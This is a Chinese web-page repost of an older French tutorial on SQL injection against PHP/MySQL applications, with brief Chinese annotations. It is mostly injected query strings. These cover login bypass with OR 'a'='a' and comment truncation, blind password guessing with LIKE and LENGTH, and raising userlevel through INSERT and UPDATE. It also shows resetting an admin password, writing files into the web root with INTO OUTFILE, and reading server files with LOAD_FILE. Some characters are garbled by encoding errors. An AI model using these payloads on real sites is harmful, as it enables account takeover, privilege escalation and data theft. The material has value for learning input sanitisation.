首页 电脑 电脑学堂 查看内容

L'injection (My)SQL via PHP

2004-9-29 20:05 747 3

摘要: PHP注入.精简版本.小夜整理.有些地方我加了注释.文章比较细致.主要介绍了三种SQL句子的注入方法. 1- SELECT 2- INSERT 3- UPDATE $req = "SELE...
关键词: WHERE SELECT password membres login varchar table email Votes nom

PHP注入.精简版本.小夜整理.有些地方我加了注释.文章比较细致.主要介绍了三种SQL句子的注入方法. 1- SELECT 2- INSERT 3- UPDATE $req = "SELECT * FROM membres WHERE name LIKE '%$search%' ORDER BY name" où $search est la variable modifiable par l'utilisateur, venant d'un formulaire post (ou autre chose) de ce type : <form method="POST" action="<? echo $PHP_SELF; ?>"> <input type="text" name="search"><br> <input type="submit" value="Search"> </form> SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name $req = "SELECT uid FROM admins WHERE login='$login' AND password='$pass'" SELECT * FROM table WHERE 1=1 SELECT * FROM table WHERE 'uuu'='uuu' SELECT * FROM table WHERE 1<>2 SELECT * FROM table WHERE 3>2 SELECT * FROM table WHERE 2<3 SELECT * FROM table WHERE 1 SELECT * FROM table WHERE 1+1 SELECT * FROM table WHERE 1--1 SELECT * FROM table WHERE ISNULL(NULL) SELECT * FROM table WHERE ISNULL(COT(0)) SELECT * FROM table WHERE 1 IS NOT NULL SELECT * FROM table WHERE NULL IS NULL SELECT * FROM table WHERE 2 BETWEEN 1 AND 3 SELECT * FROM table WHERE 'b' BETWEEN 'a' AND 'c' SELECT * FROM table WHERE 2 IN (0,1,2) SELECT * FROM table WHERE CASE WHEN 1>0 THEN 1 END -------小猪早就开始利用了.呵呵. SELECT uid FROM admins WHERE login='' OR 'a'='a' AND password='' OR 'a'='a' SELECT uid FROM admins WHERE login='John' AND password='' OR 'b' BETWEEN 'a' AND 'c' SELECT * FROM table WHERE nom='Jack'# commentaire SELECT * FROM table WHERE nom='Jack' SELECT * FROM table WHERE /* commentaires */ addresse=ཕ rue des roubys' SELECT * FROM table WHERE addresse=ཕ rue des roubys' SELECT uid FROM admins WHERE login='John'#' AND password='' SELECT uid FROM admins WHERE login='' OR admin_level=1#' AND password='' $req = "SELECT password FROM admins WHERE login='$login'" SELECT * FROM table INTO OUTFILE '/complete/path/to/file.txt' ----将表导出. SELECT password FROM admins WHERE login='John' INTO DUMPFILE '/path/to/site/file.txt' http://[target]/file.txt. frog' INTO OUTFILE '/path/to/site/file.php . $req = "SELECT uid FROM membres WHERE login='$login' AND password='$pass'" SELECT * FROM table WHERE msg LIKE '%hop' SELECT * FROM table WHERE msg LIKE 'hop%' SELECT * FROM table WHERE msg LIKE '%hop%' SELECT * FROM table WHERE msg LIKE 'h%p' SELECT * FROM table WHERE msg LIKE 'h_p' SELECT uid FROM membres WHERE login='Bob' AND password LIKE 'a%'#' AND password='' SELECT uid FROM membres WHERE login='Bob' AND LENGTH(password)=6#' AND password='' $req = "SELECT email, website FROM membres WHERE name LIKE '%$search%' ORDER BY name" SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name $req = "SELECT email, website FROM membres WHERE name LIKE '%$search%' ORDER BY $orderby" 以上是SELECT的注入.上面提到的.我们早已经掌握了.继续看 INSERT : CREATE TABLE membres ( id int(10) NOT NULL auto_increment, login varchar(25), password varchar(25), nom varchar(30), email varchar(30), userlevel tinyint, PRIMARY KEY (id) ) $query1 = "INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email',Ƈ')" INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('','','','',Ɖ')#',Ƈ') CREATE TABLE membres ( id int(10) NOT NULL auto_increment, login varchar(25), password varchar(25), nom varchar(30), email varchar(30), userlevel tinyint default Ƈ', PRIMARY KEY (id) ) $query2 = "INSERT INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'" INSERT INTO membres SET login='',password='',nom='',userlevel=Ɖ',email='' CREATE TABLE membres ( id varchar(15) NOT NULL default '', login varchar(25), password varchar(25), nom varchar(30), email varchar(30), userlevel tinyint, PRIMARY KEY (id) ) $query3 = "INSERT INTO membres VALUES ('$id','$login','$pass','$nom','$email',Ƈ')" INSERT INTO membres VALUES ('[ID]','[LOGIN]','[PASS]','[NOM]','[email protected]',Ɖ')#',Ƈ') 可见.INSERT注入关键是截断,)再加注释的利用.没问题.很简单吧.继续 UPDATE的利用 CREATE TABLE membres ( id int(10) NOT NULL auto_increment, login varchar(25), password varchar(25), nom varchar(30), email varchar(30), userlevel tinyint, PRIMARY KEY (id) ) $sql = "UPDATE membres SET password='$pass',nom='$nom',email='$email' WHERE id='$id'" UPDATE membres SET password='[PASS]',nom='',userlevel=Ɖ',email=' ' WHERE id='[ID]' UPDATE membres SET password='[nouveaupass]' WHERE nom='Admin'#',nom='[NOM]',email=' ' WHERE id='[ID]' UPDATE membres SET password='[nouveaupass]' WHERE nom='Admin' UPDATE membres SET password='[PASS]',nom='[NOM]',email=' ' WHERE id='' OR name='Admin' CREATE TABLE news ( idnews int(10) NOT NULL auto_increment, title varchar(50), author varchar(20), news text, Votes int(5), score int(15), PRIMARY KEY (idnews) ) $sql = "UPDATE news SET Votes=Votes+1, score=score+$note WHERE idnews='$id'" UPDATE news SET Votes=Votes+1, score=score+3, title='hop' WHERE idnews=཈' UPDATE news SET Votes=Votes+1, score=score+3,Votes=0 WHERE idnews=཈' UPDATE news SET Votes=Votes+1, score=score+3, title=char(104,111,112) WHERE idnews=཈' la fonction ASCII() ou ORD(). ASCII('h') et ORD('h') UPDATE news SET Votes=Votes+1, score=score+3, title=0x616263 WHERE idnews=཈' SELECT CONV("abc",16,3), CONV("abc",16,8). DATABASE() et USER() ( ou SYSTEM_USER() ou CURRENT_USER() ou SESSION_USER() ) UPDATE news SET Votes=Votes+1, score=score+3, title=DATABASE() WHERE idnews=཈' UPDATE news SET Votes=Votes+1, score=score+3, news=LOAD_FILE('/tmp/picture') WHERE idnews=཈' 一句话.当常规注入失败的时候.要想到灵活运用函数看看. OK.完毕..
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

返回顶部